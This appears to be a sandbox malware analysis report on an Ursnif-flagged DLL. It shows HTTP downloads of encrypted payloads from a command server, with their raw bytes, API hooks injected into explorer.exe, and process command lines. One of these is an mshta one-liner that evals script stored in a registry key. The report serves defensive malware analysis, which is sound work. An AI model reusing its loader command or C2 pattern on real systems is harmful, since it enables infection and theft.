                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  May 25, 2022 11:17:40.992937088 CEST | 8.8.8.8 | 192.168.2.4 | 0x3723 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)
                                  • 176.10.119.68
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.4 | 49770 | 176.10.119.68 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  May 25, 2022 11:18:01.167475939 CEST | 1383 | OUT | GET /drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:01.458622932 CEST | 1389 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 186012
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df4496b208.bin"
                                  Data Raw: ea bd a2 1d 3e 3e d3 c3 36 c2 dd da f9 57 fc d3 3c f1 a8 93 93 9a cc 6b a2 b4 af 06 ab bc f8 6a 05 ce f7 96 f1 3f 92 c2 32 8e e8 dd cd 51 6d 66 73 db 65 23 2e 01 e2 ab d1 c0 2c 7a 98 76 f4 7c db 33 4f 47 9b 24 97 a1 68 86 78 b3 18 9a e0 58 ba 3a d9 a0 b3 e4 ed a3 a1 37 7e ad d4 3c 43 bd bd 87 f8 df 34 f6 66 6e 90 b2 b3 64 aa ab b2 74 71 82 14 a2 e0 67 25 ba bc cb d1 3c e7 39 fb 54 34 9e 24 19 e7 ae ea 73 93 a9 86 2a ed 26 2d c4 d8 05 31 6d a8 65 d4 e4 c6 08 11 b1 eb 4a 99 c7 4e 4b 51 cb 0c 94 14 90 e3 13 f2 a6 e1 0c 74 e7 a5 b7 7c 48 e6 da 7c 05 c4 bd fc cf a6 d8 ec 60 7a 35 23 aa 05 1c 1b 74 8b ac 40 9d 74 56 c8 13 e3 0e e1 23 1d 6a 7b 45 35 a8 08 41 72 20 62 65 70 03 a8 6d 19 d3 e8 78 ab eb 3c 90 9b de a0 93 90 e3 6d 51 e1 fb 4c 46 cd 28 aa 05 03 69 5e eb b1 b9 c8 69 c0 bb 3d ff 38 7a 5f bc bb 7b ce d2 d2 17 06 07 55 8b b1 51 3f 7e f3 df 05 d8 b0 ad da 1b 94 75 a1 b9 63 1d d1 a5 16 14 b5 59 f9 52 f0 ec 28 a9 53 6d bd 23 5b db 85 59 a8 d3 a6 76 98 0e b0 1d 57 8f 69 0e 87 bc 26 00 84 a4 5f 83 c3 4d 38 9e 3a 11 60 12 9c a3 7c 11 3c 36 d2 1d 29 c0 ef 89 ca 90 c9 b5 98 74 eb e9 ff e9 e4 c0 a3 7c 74 59 de 3a b3 bc 0c 13 48 ea 7e 08 80 f1 aa 94 73 9d 49 f5 87 4f 36 bf 42 b5 9a 68 36 fb 2b e5 d1 33 bf f9 d9 36 0c c6 bf 84 a3 48 a2 02 df a9 25 3c 25 d0 9d 0a 6e 11 84 24 91 8f b9 3a 9e f6 24 9f ce 71 b7 f8 84 87 81 91 78 fa 70 5e 73 8e de 97 9d 54 ba 72 b6 da b9 fe 3c bf d5 cd 31 eb 9b b2 5f dd 67 84 2a 13 f5 21 c7 67 df 1d 8a 41 7a 1e cf f5 4c 54 89 a0 b3 c4 af b5 e2 a9 ae 0a 94 e8 7a 92 4d d7 44 b9 87 dd 6b 5e ae eb ca 1a f8 a6 78 89 03 a1 61 8b 01 f0 80 89 5e 03 2d ed 92 a1 93 17 ed 95 5e c5 ff 84 0e 82 ae 1b 4b ee b3 75 3e 26 3e 2b be 39 29 6d 2d e7 92 a3 f9 f6 07 02 6f 9b 8e 36 73 69 15 fc e4 93 2e 07 a6 f4 96 76 61 96 9d 31 e9 17 40 2d 2c 9e da c5 f8 c0 06 63 7b a1 f1 fd c7 b7 90 a0 66 8a 89 3f 05 83 f4 a7 11 a1 6c ee f2 fd b0 2a 61 4a 6d ac 4f c7 c5 83 96 04 38 6f 1f c0 f4 d6 9c 43 9b a6 f8 98 98 41 56 a7 bf 62 e4 8f 4c 8f 
d9 33 89 de df bd 1c e7 75 47 56 fb 6e a7 c6 4e 41 11 45 91 45 9c 65 42 50 9a 50 b0 89 91 5d 9a 3d 6d 94 24 21 b0 23 c5 42 d0 ec 3c 73 12 1c 4b 77 16 c7 e6 fb ae 2f 99 5b 98 41 9a 0f 93 47 20 d3 c0 cc a1 26 fa 0e 0a 55 41 b3 00 55 8d b0 fb a9 ef 8e 6d fc 70 9c 26 04 b7 c0 45 b3 e4 43 94 bd 47 2b 41 4c 72 40 35 3f d8 2a e2 da 64 9e 70 d3 a6 c5 99 4b b8 78 f8 e3 7e 09 0a e3 ac 02 de 72 1a 94 51 8c e9 23 b6 74 72 b4 59 ea 6a 95 b8 25 0f 92 0c f5 f0 1d c3 72 c4 bc 33 0c d5 af b5 03 c6 b8 d8 a0 1a 3c d4 75 f1 c8 d6 e0 1b 85 fc bb 5d e9 65 13 f9 72 fb 1c f8 5b 14 d6 b2 f2 2b 3c d3 49 23 64 ba 0a 35 c6 7b 57 37 0b da 94 27 53 89 b4 b4 b0 49 f5 9a d8 d8 06 8e ab c0 c6 2d 0d f3 78 8b 28 66 b4 85 bc 35 14 e2 1c b9 46 20 81 05 1a ec 2d 7a 88 2e 6b 02 7e 9f 13 35 e8 fe 19 8f b0 5d 05 9b f2 e5 bb 53 fd 75 f0 f7 89 f7 c2 f5 19 e2 00 51 d5 a1 42 19 73 0f ff 48 80 f3 4d 01 ab 61 12 fb 06 1f 4e 65 4a 3c 07 ec 30 1c a5 bf c3 12 a8 0d c6 69 cc c0 4e 44 84 8c 1c 77 31 25 9f 83 8a 18 4a d3 e3 fc c3 e6 79 21 67 3e 95 66 d4 97 b2 65 64
                                  Data Ascii: >>6W<kj?2Qmfse#.,zv|3OG$hxX:7~<C4fndtqg%<9T4$s*&-1meJNKQt|H|`z5#t@tV#j{E5Ar bepmx<mQLF(i^i=8z_{UQ?~ucYR(Sm#[YvWi&_M8:`|<6)t|tY:H~sIO6Bh6+36H%<%n$:$qxp^sTr<1_g*!gAzLTzMDk^xa^-^Ku>&>+9)m-o6si.va1@-,c{f?l*aJmO8oCAVbL3uGVnNAEEeBPP]=m$!#B<sKw/[AG &UAUmp&ECG+ALr@5?*dpKx~rQ#trYj%r3<u]er[+<I#d5{W7'SI-x(f5F -z.k~5]SuQBsHMaNeJ<0iNDw1%Jy!g>fed
                                  May 25, 2022 11:18:01.636548042 CEST | 1588 | OUT | GET /drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:01.915646076 CEST | 1591 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 238736
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df449db197.bin"
                                  Data Raw: 77 23 28 92 02 ab 89 1f 5f 83 9b 9c dd 81 51 65 54 10 d3 af 4b a6 45 ed 4e 1f a1 c3 01 69 7d 5a bf 5b 1e 82 db 9c 68 a5 6c 5f b0 75 f6 0f b7 c6 a1 bd 5b 3a a6 23 97 c6 03 43 dd 6d c5 b0 87 f4 4d 2f 4b 42 12 50 ad 5d dc 48 86 7c 01 77 de d8 da aa f9 03 76 23 01 98 69 2c 89 0d d3 12 46 ac 39 36 aa 08 9a ea 7b a2 bb dc a7 78 26 04 8f 03 9d 87 34 1c aa 22 b0 6e 13 c3 27 44 5f c7 24 c4 22 e2 5b 96 27 30 31 bb 1b 43 2a 2b e9 3d ff bf 61 0c 7f ea 6f 0e 70 66 5a db cb ba d0 e3 0b ba 9e 5b a1 9b a4 95 7b 3a af ed 6f 61 0b 44 d3 2f c6 1e 90 51 c3 c1 c5 89 c2 6d 83 89 b6 90 00 46 d8 4f 01 66 2b 12 85 9c 8f d3 8f 99 d3 46 32 cb 96 9a 6b dd cf fe 1c 68 56 94 4b 48 55 a4 e6 cf 41 29 29 d6 3f 70 a3 26 e9 4e 34 40 ee c9 1d 0e 80 a9 ee c7 7a 15 78 bb bf d4 ec 56 96 fc b3 5d f9 a6 3e 05 30 4f 9f 5c 66 3e 5d e6 1d c5 5a 9c 9d 23 2f b4 5d 1f b9 cd 29 a3 ad f1 1a cb e2 ab f1 81 3d 6d 7a 1d 3e 8a a3 3b e9 fb 87 8f fc 55 17 a1 b6 0c 89 45 2a 96 0b 51 b7 4d f6 46 12 eb 91 18 82 15 7a cf 3a 6f 8e 28 7e ff db 55 bb 2e f7 9c 64 d4 da c5 c4 bb cb 89 cb 43 9f dc 7c 48 7a e6 2d 12 da 8c f4 44 f2 d1 08 29 69 75 0e 2d b9 ce f8 bb 06 26 10 21 0c c0 5e 42 85 6b 23 78 75 ec 94 8a 35 30 17 2d 5c 3c 93 2f 93 f9 96 23 1c f8 b6 84 ef ea 0c aa ad 1c 54 4f ed f5 0e 13 b0 3c cf 20 9a e4 46 5f c4 1d ea 00 d9 51 80 9f e6 4a b6 f2 68 bb 5b dd 53 ba eb d3 26 db 92 4a d0 73 5e 9b 1b 33 dc ab 4e 0b 55 13 81 ae fd 77 49 bc 01 ec 4b f9 09 ea 60 dd ea 46 2a 25 13 25 b3 bb 18 3c 3f 70 76 5a 9a 93 33 45 46 3f f0 c7 5b 9d a3 49 72 e5 8c 25 f1 cf f0 a6 dd ce 07 77 b5 9f 3e ea fc 4e 8c af f2 8c 21 b5 b6 7f d7 66 a5 79 fd 81 e3 a0 dd 10 04 59 d0 1c 92 2d bc 1f 62 e4 f2 00 73 91 bc 71 bc 20 06 ce 41 6a 6a 9a ee b9 fa 54 72 92 00 0c 49 27 e1 ba f1 5c 1c 06 eb 35 1a 00 45 db e4 31 ab 88 96 b0 ff 26 89 2d fc c8 31 1b 64 18 49 7a 9c 1f 31 8a 99 ed 74 76 f7 46 43 91 5f 2b e5 a4 4f 81 43 83 2f 2b f0 58 b3 e7 26 b1 48 31 fd 47 12 51 d2 9f 37 4a cb b3 44 f1 c1 1d 0d 0d c0 ed e1 ba b1 e7 
f8 a4 7e d5 9b c0 fb cc 8e db fd 21 90 fa 1b 7c 17 b9 00 5a 3f 65 0c 07 23 c6 2d 31 69 87 ad 3d 0c d1 dc 5d 1b da 7a 19 1d e9 8f 0c 84 2d b7 76 f3 12 78 41 32 32 7c d9 b9 67 bd 09 af d5 eb 22 86 ce 7a eb 59 f5 4c fe 59 7e b5 5e 72 9c 41 b3 0d b0 61 27 61 69 ce 8f 3d e6 89 c1 3e 80 d4 bf 05 80 c9 5c 15 2e b0 d1 89 c8 1a 18 8b e9 a0 14 1f 38 52 13 2f 4e 97 88 34 65 1a 1c a3 c7 03 94 1c fd f5 00 d4 0c 66 1b ff bc 33 3a ea 99 93 06 2f a1 af 76 09 dd 35 58 e4 b5 16 87 6a f1 a5 f4 46 8e 6f 0e 91 42 b5 f9 90 ee 4b b8 55 38 76 ad 9e 59 2a 4f 47 b6 a1 a7 88 91 de 66 63 c5 1a c6 b9 f5 2d 71 e2 34 af db 56 7a 7e 08 b2 e1 3d 45 1e b1 d2 f4 be ff e0 ca 97 16 6d d7 ac fa 3d d9 dd 2b 98 8c 30 d8 d8 da f5 6f 43 2a c1 e2 39 58 57 5c f3 84 d2 8a fc 41 e8 b6 86 b5 d6 a9 cc 11 26 e2 5c 78 11 68 89 b8 d7 de 59 36 54 af e2 df ca 98 1e bc cf 75 02 7b 79 f6 a2 6e 13 90 b1 92 fc b3 ce a4 e2 34 91 55 9e fa 3b 0f 72 ab a2 4d 99 44 12 d5 e9 35 3f 40 50 46 79 d5 46 6d f3 1c db ef 73 2a 9e 2e a3 e6 41 21 e8 98 b1 58 a4 50 23 08 6f 7c 86 1c 56
                                  Data Ascii: w#(_QeTKENi}Z[hl_u[:#CmM/KBP]H|wv#i,F96{x&4"n'D_$"['01C*+=aopfZ[{:oaD/QmFOf+F2khVKHUA))?p&N4@zxV]>0O\f>]Z#/])=mz>;UE*QMFz:o(~U.dC|Hz-D)iu-&!^Bk#xu50-\</#TO< F_QJh[S&Js^3NUwIK`F*%%<?pvZ3EF?[Ir%w>N!fyY-bsq AjjTrI'\5E1&-1dIz1tvFC_+OC/+X&H1GQ7JD~!|Z?e#-1i=]z-vxA22|g"zYLY~^rAa'ai=>\.8R/N4ef3:/v5XjFoBKU8vY*OGfc-q4Vz~=Em=+0oC*9XW\A&\xhY6Tu{yn4U;rMD5?@PFyFms*.A!XP#o|V
                                  May 25, 2022 11:18:02.070939064 CEST | 1844 | OUT | GET /drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:02.358270884 CEST | 1845 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1870
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df44a518cc.bin"
                                  Data Raw: 16 73 69 31 09 06 6d 67 f0 e8 32 67 f7 0a 83 93 06 b9 df f8 37 51 1c 9d 9c 07 14 8f dc 5f 0c a3 1b 40 e9 a6 4f 90 34 e9 29 61 44 14 68 59 01 07 9d 75 5f 14 0d 89 33 23 dc 16 33 c5 a1 b7 2a 2b 04 69 ac be 28 5a 15 ed 24 be 2e 0a d4 54 44 07 1c 3c a1 5f 82 95 2b ec 34 ec ff 8e 52 c3 14 cb 86 87 b4 22 9b 54 47 47 e2 b0 56 01 6f 6f ee 38 14 2f 39 e9 c3 5e b7 d2 86 a1 f7 28 2e 2b bc 8f 66 4a 99 ea 61 ce 3d eb 59 2b 32 ba 1f 6d 95 cd 1a 43 93 dd b1 e6 b8 a6 fe 00 03 2d 11 b4 6a 10 e7 19 e4 3f f5 bf 36 04 79 00 58 c4 d0 12 4c e0 35 90 db c0 87 eb 8a a8 93 2b a7 7c cf f0 68 31 3b 31 68 d3 d7 e9 64 1f 3e bf 79 bc 42 80 b8 c0 b0 c9 5a 23 dd 78 10 86 f8 30 44 87 ba 6c 75 5c d2 80 bd c3 14 03 9f 17 fd f7 f0 4a a6 4f da c2 53 be e6 99 70 40 bd a6 a1 d9 12 51 8e e9 8d 99 45 7b cd fd ba 10 b0 85 d3 0d cc 62 b0 82 02 8b d7 51 51 5c c7 7f 57 85 c7 1c 7d e8 4c c2 59 39 c7 f0 6d 72 2a 86 ef a4 4e c8 bc f0 c3 44 f1 e7 b7 d4 6a b1 c0 5d a0 f6 06 06 86 79 68 a0 04 75 95 68 64 35 a7 2b 10 c3 89 9b 92 05 4f a9 16 a1 6e a4 5b 65 f3 a0 d3 ee 2a 5f a7 a2 51 72 0f 3d 08 fe da b8 eb 54 5d 8b a1 4d af 3b ae a8 29 d1 fe 8f e8 ae b8 0e 78 84 1e f4 78 5d 35 39 2d 2b 9d a4 cd 46 ae a1 68 ea 17 21 0c 5b 39 91 53 97 61 5d af 25 af 50 60 48 02 fa 0d 74 fa de 26 e9 9b 15 5f 12 6c bd 24 fe 44 c8 bc 86 b6 34 a6 35 f5 52 c2 e9 d1 ca af 12 31 9a 6b aa a0 7a 79 95 b6 1e 8b 83 29 b7 b2 85 18 5d 31 3c 0b 29 f4 1c ea a0 d9 d9 84 d3 c5 4a 7f 11 44 20 e2 1e c4 27 8d 17 5a 5f a1 e8 1e cb 8f ab 3f a9 9e 2f dd 48 35 0b 41 9e 48 8a 4c 9b 15 1a d4 43 66 80 ca 89 34 a5 de b0 d5 fb 6c 45 30 ee 1b 22 3f 5e 42 ff 82 a5 97 e5 c5 d5 41 6e 55 ff f7 70 a9 ae da 49 ed fb c3 40 18 37 db 1e 14 0b 72 0c ca 7e 17 bc 5f ab ab 3f 50 8f 71 10 b8 94 56 5a 37 6e 4b 94 31 8c aa 32 dc c2 5a d1 67 8d 1c b4 f9 8b 51 e2 c2 3c 19 8b c5 ff 49 28 68 17 97 6e 26 73 0e 2b 97 a3 4d 77 5a 3e 92 19 b3 d7 5c a1 ec e4 cb 05 30 73 ee 02 04 30 fa e3 6e 87 78 20 2d c1 4a 06 0e 8e e6 fc 00 08 5e e2 a7 fe 72 4c 
d2 b7 4a 82 1e 37 d3 b4 6a ae b7 d0 27 2a 31 c9 22 03 9e f0 6d a1 8c f9 47 3e f2 d8 98 93 bb 3c 16 ae f6 25 f2 9b 91 e3 dc 57 df 9d cf a5 28 4f 75 c7 a7 c4 81 2f fc 7f 4a a1 df 87 68 bc f7 66 c1 2c 48 91 ce 0e 96 f9 68 1f a5 66 36 3b 39 14 02 be 06 aa aa b6 60 70 d6 fe 13 eb 16 ca 2f 1c 81 b6 e2 1d 04 1e 2e 53 4c 94 46 f8 56 ed 5e fd 3d 48 cd 87 b7 04 0a 31 b5 9e 3a f4 e8 45 30 8b fd 23 a4 01 8a 20 6a ae 83 02 f6 26 81 38 97 69 db 72 e2 83 c8 13 a4 38 f3 04 bb f6 53 a7 62 04 1d ed 09 6b 32 6e ec 8a 2c 93 81 78 90 73 16 0d 4e e5 b0 98 c1 33 fd 26 a6 07 7d e5 72 41 30 5c 00 ff 8a b7 2f 96 71 b6 f9 7b 8f 67 7d a1 cd ed 16 4d 16 cc a1 d6 9f c2 08 5b 62 ed c9 01 1a 4a 0b 71 72 be 28 be eb 5d ea 9b 23 60 bb 90 51 33 ea 0f e3 f6 5c 11 d0 4e 7f f2 69 49 8f 45 fa 88 86 36 3d 00 f8 ca 46 9c 18 c5 e3 38 2a a5 b4 04 f4 66 f6 29 cb ce 7b 91 f1 cd a4 e3 14 4f 52 ac 7f 45 d7 4b c5 58 40 43 98 c4 44 6e 78 13 b7 d8 84 35 8e 32 af b6 ff b0 78 97 60 91 1b 75 84 fd d8 4c d2 b2 32 2c 87 b3 18 e3 fc 42 2c 52 90 26 be 18 ba 3b 3c cd e8 f2 d1
                                  Data Ascii: si1mg2g7Q_@O4)aDhYu_3#3*+i(Z$.TD<_+4R"TGGVoo8/9^(.+fJa=Y+2mC-j?6yXL5+|h1;1hd>yBZ#x0Dlu\JOSp@QE{bQQ\W}LY9mr*NDj]yhuhd5+On[e*_Qr=T]M;)xx]59-+Fh![9Sa]%P`Ht&_l$D45R1kzy)]1<)JD 'Z_?/H5AHLCf4lE0"?^BAnUpI@7r~_?PqVZ7nK12ZgQ<I(hn&s+MwZ>\0s0nx -J^rLJ7j'*1"mG><%W(Ou/Jhf,Hhf6;9`p/.SLFV^=H1:E0# j&8ir8Sbk2n,xsN3&}rA0\/q{g}M[bJqr(]#`Q3\NiIE6=F8*f){OREKX@CDnx52x`uL2,B,R&;<


                                  Code Manipulations

                                  Function Name | Hook Type | Active in Processes
                                  CreateProcessAsUserW | EAT | explorer.exe
                                  CreateProcessAsUserW | INLINE | explorer.exe
                                  CreateProcessW | EAT | explorer.exe
                                  CreateProcessW | INLINE | explorer.exe
                                  CreateProcessA | EAT | explorer.exe
                                  CreateProcessA | INLINE | explorer.exe
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe

                                  Function Name | Hook Type | New Data
                                  CreateProcessAsUserW | EAT | 7FF80250521C
                                  CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                  CreateProcessW | EAT | 7FF802505200
                                  CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                  CreateProcessA | EAT | 7FF80250520E
                                  CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

                                  Function Name | Hook Type | New Data
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FF802505200
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 607B6B0

                                  Function Name | Hook Type | New Data
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FF802505200
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 607B6B0


                                  Target ID:0
                                  Start time:11:17:22
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\loaddll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll"
                                  Imagebase:0x11a0000
                                  File size:116736 bytes
                                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:1
                                  Start time:11:17:22
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                                  Imagebase:0x1190000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:2
                                  Start time:11:17:23
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                                  Imagebase:0x1360000
                                  File size:61952 bytes
                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:4
                                  Start time:11:17:24
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:11:17:28
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:23
                                  Start time:11:18:04
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:25
                                  Start time:11:18:06
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                  Imagebase:0x7ff74ed60000
                                  File size:14848 bytes
                                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:26
                                  Start time:11:18:09
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
